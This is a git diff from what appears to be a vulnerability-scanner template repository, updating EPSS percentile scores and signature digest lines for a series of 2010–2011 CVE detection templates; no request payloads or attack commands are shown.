index cd2593346a..ea5c7efc9f 100644 --- a/http/cves/2010/CVE-2010-2682.yaml +++ b/http/cves/2010/CVE-2010-2682.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2682 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:realtyna:com_realtyna:1.0.15:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220739ea20b7e9420b63a42b46ef9e4354ff599fd33ca68c4dad6aebd53ad2eddd6022100d61654354e8465869d28c5b62fe8004de0788fae8996ab60250f24f6a751f46a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220739ea20b7e9420b63a42b46ef9e4354ff599fd33ca68c4dad6aebd53ad2eddd6022100d61654354e8465869d28c5b62fe8004de0788fae8996ab60250f24f6a751f46a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index 01ea27188a..df20dd9ded 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2857 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:danieljamesscott:com_music:0.1:-:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402203d258d239c9248b152f83ca3698b1670e40544ee08c8e9966db8b11415806d85022052c897042896318c98cd2f3d26a882efddd9ab0afe0811c65efc87a0a7b55015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402203d258d239c9248b152f83ca3698b1670e40544ee08c8e9966db8b11415806d85022052c897042896318c98cd2f3d26a882efddd9ab0afe0811c65efc87a0a7b55015:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 3e82aaf739..e63c76ad63 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.02847 - epss-percentile: 0.89585 + epss-percentile: 0.89594 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204228b5b9b4f8ba1d91a2ea6b6b0d0be9cc665091493b3661e5707dbf837c63f602201f167a96b43e54ba0d63c21214df5265733d0591b05525bd7301e74bd144bc18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204228b5b9b4f8ba1d91a2ea6b6b0d0be9cc665091493b3661e5707dbf837c63f602201f167a96b43e54ba0d63c21214df5265733d0591b05525bd7301e74bd144bc18:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-2920.yaml b/http/cves/2010/CVE-2010-2920.yaml index 01dc51819c..db6bfc1612 100644 --- a/http/cves/2010/CVE-2010-2920.yaml +++ b/http/cves/2010/CVE-2010-2920.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-2920 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90512 + epss-percentile: 0.90518 cpe: cpe:2.3:a:foobla:com_foobla_suggestions:1.5.1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022053a84ae5c244fc2df18c42a6eb79913c88ffdd3d798dbd4abfdd18974cdcc1530220138f2be195f4cacba94a40f95991af4932366382a4ca6b7778fc55d6a67c093e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022053a84ae5c244fc2df18c42a6eb79913c88ffdd3d798dbd4abfdd18974cdcc1530220138f2be195f4cacba94a40f95991af4932366382a4ca6b7778fc55d6a67c093e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index 30ae3e590d..34c9a2ca3e 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-3203 cwe-id: CWE-22 epss-score: 0.00626 - epss-percentile: 0.76681 + epss-percentile: 0.76696 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220270c341beb6e046fac04b9caab6d6c9f6f23f80c422ac49ec4f586c79eab0a8802204a37a39bd36ecd69596c7517dfb028a19febde009dddd42b43b0970d47158f90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220270c341beb6e046fac04b9caab6d6c9f6f23f80c422ac49ec4f586c79eab0a8802204a37a39bd36ecd69596c7517dfb028a19febde009dddd42b43b0970d47158f90:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-3426.yaml b/http/cves/2010/CVE-2010-3426.yaml index 92c91f06b1..8c50b13dad 100644 --- a/http/cves/2010/CVE-2010-3426.yaml +++ b/http/cves/2010/CVE-2010-3426.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-3426 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:4you-studio:com_jphone:1.0:alpha3:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100af99a706bd6a892121e4aa2a4c9112208411062138463891a23f8e0bdd2b69f9022100b749225c7e119f6c0e23ff117cc21833f847923d3b4e0897d937411979327753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100af99a706bd6a892121e4aa2a4c9112208411062138463891a23f8e0bdd2b69f9022100b749225c7e119f6c0e23ff117cc21833f847923d3b4e0897d937411979327753:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index e698b4765f..a07b937d4a 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - epss-percentile: 0.86067 + epss-percentile: 0.86076 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fbacaeed449d1c4eed5359f5201e1b0492b923d873d0ccd219673a6989e46ce302201076b1197a4808dc8f1a7a575a75abcc3d46bb7f13a591ad940479a1aaabc411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fbacaeed449d1c4eed5359f5201e1b0492b923d873d0ccd219673a6989e46ce302201076b1197a4808dc8f1a7a575a75abcc3d46bb7f13a591ad940479a1aaabc411:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 8944b9286c..925e7facae 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-4239 cwe-id: CWE-20 epss-score: 0.03561 - epss-percentile: 0.9055 + epss-percentile: 0.90556 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022016dcd81dfa3c03b176fc2abe3ccf4915761daeedaf0791684338c4d35081391302202bff49e8b18d325b524a9ac55b238dd97cde4694c34327fc00fdeb50bb434aed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022016dcd81dfa3c03b176fc2abe3ccf4915761daeedaf0791684338c4d35081391302202bff49e8b18d325b524a9ac55b238dd97cde4694c34327fc00fdeb50bb434aed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 0d873eb717..89cd4e1899 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4282 cwe-id: CWE-22 epss-score: 0.01214 - epss-percentile: 0.83754 + epss-percentile: 0.83763 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d948af8fe9f54eff8ed25afdb0e6823fa9d0a10aa0dc07ff90672197cc812bcd022100d50446dae0fd5dd50b60c2b4abaa335cd0d902147471de33530a1b01e56e1e0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d948af8fe9f54eff8ed25afdb0e6823fa9d0a10aa0dc07ff90672197cc812bcd022100d50446dae0fd5dd50b60c2b4abaa335cd0d902147471de33530a1b01e56e1e0d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4617.yaml b/http/cves/2010/CVE-2010-4617.yaml index f58d6d8fdd..025fe68565 100644 --- a/http/cves/2010/CVE-2010-4617.yaml +++ b/http/cves/2010/CVE-2010-4617.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-4617 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80069 + epss-percentile: 0.80076 cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008e0282a21d86a1da7371d9b181c675339d3173bf3a77ca71820bdcacb57248f2022100c5ed4ed4514a85371cac32470e92f9d598784a483520271da2dd7340cb66c9f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008e0282a21d86a1da7371d9b181c675339d3173bf3a77ca71820bdcacb57248f2022100c5ed4ed4514a85371cac32470e92f9d598784a483520271da2dd7340cb66c9f8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4719.yaml b/http/cves/2010/CVE-2010-4719.yaml index 1e35db9bf6..46729279ce 100644 --- a/http/cves/2010/CVE-2010-4719.yaml +++ b/http/cves/2010/CVE-2010-4719.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4719 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.91539 + epss-percentile: 0.91545 cpe: cpe:2.3:a:fxwebdesign:com_jradio:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201a13f158db34cf7773db8c3c05f55d7ae6a029a0fde5b40dfe6b82dde56b3446022100a8037367f19888a041520a2bd60c5d5b1cc3c00af04fc7748403517d1b841842:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201a13f158db34cf7773db8c3c05f55d7ae6a029a0fde5b40dfe6b82dde56b3446022100a8037367f19888a041520a2bd60c5d5b1cc3c00af04fc7748403517d1b841842:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4769.yaml b/http/cves/2010/CVE-2010-4769.yaml index c5beaa028d..15eab1e325 100644 --- a/http/cves/2010/CVE-2010-4769.yaml +++ b/http/cves/2010/CVE-2010-4769.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-4769 cwe-id: CWE-22 epss-score: 0.00938 - epss-percentile: 0.81361 + epss-percentile: 0.81372 cpe: cpe:2.3:a:janguo:com_jimtawl:1.0.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b6cc538303353eb1d69de90d6e4725d0e59ebcda558583b4acaa930edc55ca8502206ab4eaa65c37da560e37a8f10e1145a47a00484146af279a65cb969f9990c9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b6cc538303353eb1d69de90d6e4725d0e59ebcda558583b4acaa930edc55ca8502206ab4eaa65c37da560e37a8f10e1145a47a00484146af279a65cb969f9990c9a5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 7a26fe4d68..9e220fb4ea 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.002 - epss-percentile: 0.57674 + epss-percentile: 0.57693 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cd0e29f513d29759bc7e9659a9d454ee373569ad45fe597831a3791186ea86f102201488fe856d05811f65ae74b4426e87489d7dcf097af966655cbd6cfd37e908d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cd0e29f513d29759bc7e9659a9d454ee373569ad45fe597831a3791186ea86f102201488fe856d05811f65ae74b4426e87489d7dcf097af966655cbd6cfd37e908d4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 9bb1d71dbd..190a57c574 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.0136 - epss-percentile: 0.84767 + epss-percentile: 0.84776 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200feb604462acb5b5934cabe466ef522740bcfbb046bf02dc0e49421543745d52022100c49d106f4903735aec3fdc62d014be1208ffeea329b3b62e365021a5cb975cdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200feb604462acb5b5934cabe466ef522740bcfbb046bf02dc0e49421543745d52022100c49d106f4903735aec3fdc62d014be1208ffeea329b3b62e365021a5cb975cdb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index e25258a5a0..e4719916fa 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2010-5278 cwe-id: CWE-22 epss-score: 0.04725 - epss-percentile: 0.9174 + epss-percentile: 0.91745 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009f0c489a8b97a2b9be4b21577de0283a69bc7997eae1635d131c51dd58ca7b1402205d180f67f5d0120f4621161307fe03398b6a4ca561cc5d080851cd5c95674257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009f0c489a8b97a2b9be4b21577de0283a69bc7997eae1635d131c51dd58ca7b1402205d180f67f5d0120f4621161307fe03398b6a4ca561cc5d080851cd5c95674257:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index d4d17f0961..82fceff392 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-5286 cwe-id: CWE-22 epss-score: 0.04708 - epss-percentile: 0.91726 + epss-percentile: 0.91731 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc38b3713392db1665d86a08e4ac9891914e04b3d69064ba9a3758c2c6203a710220046ed30f9ee1c59f067f709e6a148a8e4ebeee7248be73ec61fa487c0e7a409f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cc38b3713392db1665d86a08e4ac9891914e04b3d69064ba9a3758c2c6203a710220046ed30f9ee1c59f067f709e6a148a8e4ebeee7248be73ec61fa487c0e7a409f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index 08a0cdf611..6c0ebb25a7 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-0049 cwe-id: CWE-22 epss-score: 0.96615 - epss-percentile: 0.99497 + epss-percentile: 0.99499 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033b94829500d6e8fce18d066477f6969b74452d3e513bb3a64885df686968fc4022100dd4ca9c4c654f4f460e18c42f465aade027b976b6b44450470bdc7b06809c413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022033b94829500d6e8fce18d066477f6969b74452d3e513bb3a64885df686968fc4022100dd4ca9c4c654f4f460e18c42f465aade027b976b6b44450470bdc7b06809c413:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-1669.yaml b/http/cves/2011/CVE-2011-1669.yaml index 8c6c7d3ed3..b845898516 100644 --- a/http/cves/2011/CVE-2011-1669.yaml +++ b/http/cves/2011/CVE-2011-1669.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-1669 cwe-id: CWE-22 epss-score: 0.02966 - epss-percentile: 0.89763 + epss-percentile: 0.89773 cpe: cpe:2.3:a:mikoviny:wp_custom_pages:0.5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fade7d066122033419f666784605386ca1aa6e850d49790782c78e91cef3e6cc022100d66233708586f1a6e7a3b301da999bc661629347512d23482fc83eef2aa925e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fade7d066122033419f666784605386ca1aa6e850d49790782c78e91cef3e6cc022100d66233708586f1a6e7a3b301da999bc661629347512d23482fc83eef2aa925e2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index aee2f19092..a929d39ba4 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - epss-percentile: 0.85695 + epss-percentile: 0.85705 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fc4bbd724f077d648bbb1ae79b79c82e50c4de31d9a3162bff02c0cb4919df92022100cde1348a36ec1639d6b2b9121d5528b500a14bd8cfc76769d619302ea9d45e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fc4bbd724f077d648bbb1ae79b79c82e50c4de31d9a3162bff02c0cb4919df92022100cde1348a36ec1639d6b2b9121d5528b500a14bd8cfc76769d619302ea9d45e15:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index 77442d560e..6a6415b08b 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - epss-percentile: 0.90273 + epss-percentile: 0.90279 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b1e5505571b0c5cc9cc503e85ef3d31aeb454c6d2059f89151536995bc2d99c9022100e6f58fcc56903c5ff1061297c27e4566f4e331ffa03ae7aaf33b0693d4fbf770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b1e5505571b0c5cc9cc503e85ef3d31aeb454c6d2059f89151536995bc2d99c9022100e6f58fcc56903c5ff1061297c27e4566f4e331ffa03ae7aaf33b0693d4fbf770:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-3315.yaml b/http/cves/2011/CVE-2011-3315.yaml index ac09ef7391..92de088a46 100644 --- a/http/cves/2011/CVE-2011-3315.yaml +++ b/http/cves/2011/CVE-2011-3315.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-3315 cwe-id: CWE-22 epss-score: 0.90502 - epss-percentile: 0.98475 + epss-percentile: 0.98477 cpe: cpe:2.3:h:cisco:unified_ip_interactive_voice_response:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index ae8d6caeb7..8820cbdc16 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2011-4336 cwe-id: CWE-79 epss-score: 0.00182 - epss-percentile: 0.55388 + epss-percentile: 0.55404 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -43,4 +43,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022009908e1e031d3eb4a1b81346a770948577a53fc2e7f5952d889796f19ab93d5a022067ad9d8f870e0fec7d1ead2dca4ad1853047a5e01793cea188b3d976ecd3a492:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022009908e1e031d3eb4a1b81346a770948577a53fc2e7f5952d889796f19ab93d5a022067ad9d8f870e0fec7d1ead2dca4ad1853047a5e01793cea188b3d976ecd3a492:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4618.yaml b/http/cves/2011/CVE-2011-4618.yaml index 2bba565552..4bd1bab283 100644 --- a/http/cves/2011/CVE-2011-4618.yaml +++ b/http/cves/2011/CVE-2011-4618.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2011-4618 cwe-id: CWE-79 epss-score: 0.00746 - epss-percentile: 0.78874 + epss-percentile: 0.78886 cpe: cpe:2.3:a:simplerealtytheme:advanced_text_widget_plugin:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -44,4 +44,5 @@ http: - 'contains(body_2, "")' - 'contains(body_1, "Advanced Text Widget")' condition: and -# digest: 4b0a00483046022100f31a3ebcfc96acd8be213c37a05c1fe8e9c69e7ec217f17b48d1d2cbd4dbb76602210085a3e4e1fb886f32c7427121bbf22e0e2e1db81ed7892a751f1b4ce6563b35f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100f31a3ebcfc96acd8be213c37a05c1fe8e9c69e7ec217f17b48d1d2cbd4dbb76602210085a3e4e1fb886f32c7427121bbf22e0e2e1db81ed7892a751f1b4ce6563b35f7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4624.yaml b/http/cves/2011/CVE-2011-4624.yaml index 3923fa0145..bba96f35de 100644 --- a/http/cves/2011/CVE-2011-4624.yaml +++ b/http/cves/2011/CVE-2011-4624.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2011-4624 cwe-id: CWE-79 epss-score: 0.00301 - epss-percentile: 0.6619 + epss-percentile: 0.66205 cpe: cpe:2.3:a:codeasily:grand_flagallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c559894ffbae099e3e1c10808e8629019535827f561f070e5c9f84ba23206660220525f3f9c5d11ccaa2ffed5e5f4cc0597efabfb03d16ab0887d1bef3b77e5ad92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402204c559894ffbae099e3e1c10808e8629019535827f561f070e5c9f84ba23206660220525f3f9c5d11ccaa2ffed5e5f4cc0597efabfb03d16ab0887d1bef3b77e5ad92:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index 2e7b2ae49b..333c1d1594 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-4804 cwe-id: CWE-22 epss-score: 0.0358 - epss-percentile: 0.9058 + epss-percentile: 0.90586 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100da0e839ac30de58262776a4f53764500810cbdad8cfdea0c5387bd611e93ab4502201b88ef2ec3fff5151d04b89e74ca5ffcdf135f679b0f4fc6105292f1bb417f8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100da0e839ac30de58262776a4f53764500810cbdad8cfdea0c5387bd611e93ab4502201b88ef2ec3fff5151d04b89e74ca5ffcdf135f679b0f4fc6105292f1bb417f8c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index 0cbf7e6d0a..9186abaa43 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01001 - epss-percentile: 0.81976 + epss-percentile: 0.81994 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202628116f311e71adda6ce383e66d93edc3042127072c3022651a89881e2ec54e02204f933a5e4d25b467e782b1337ac1303a014519b253971f7f23d315c8c8164458:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202628116f311e71adda6ce383e66d93edc3042127072c3022651a89881e2ec54e02204f933a5e4d25b467e782b1337ac1303a014519b253971f7f23d315c8c8164458:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index 865b95a022..ab24842d8b 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.00434 - epss-percentile: 0.71813 + epss-percentile: 0.71829 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eebc83091266900f76c13098ffc1c56e40941e0bc41710dc2af513ff1a80892e022100f52d5637dcc47dca23b6c656ebcb0f2e81d9586c171fe989df52b7286fefc342:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100eebc83091266900f76c13098ffc1c56e40941e0bc41710dc2af513ff1a80892e022100f52d5637dcc47dca23b6c656ebcb0f2e81d9586c171fe989df52b7286fefc342:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml index 24a0973d48..6b6056b5b1 100644 --- a/http/cves/2011/CVE-2011-5107.yaml +++ b/http/cves/2011/CVE-2011-5107.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5107 cwe-id: CWE-79 epss-score: 0.00214 - epss-percentile: 0.5932 + epss-percentile: 0.59342 cpe: cpe:2.3:a:wordpress:alert_before_you_post:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201baa1a50bbd5882123fcb3dd91a62a77e930fb2ed83b19fc14c8694e5c16777e0221009a8ae556ba328863d52653da60097b41e7e2893af157a71098a208d73d698c2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201baa1a50bbd5882123fcb3dd91a62a77e930fb2ed83b19fc14c8694e5c16777e0221009a8ae556ba328863d52653da60097b41e7e2893af157a71098a208d73d698c2a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2011/CVE-2011-5179.yaml b/http/cves/2011/CVE-2011-5179.yaml index da92278d4e..b67fec72f4 100644 --- a/http/cves/2011/CVE-2011-5179.yaml +++ b/http/cves/2011/CVE-2011-5179.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2011-5179 cwe-id: CWE-79 epss-score: 0.00214 - epss-percentile: 0.5932 + epss-percentile: 0.59342 cpe: cpe:2.3:a:skysa:skysa_app_bar_integration_plugin:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 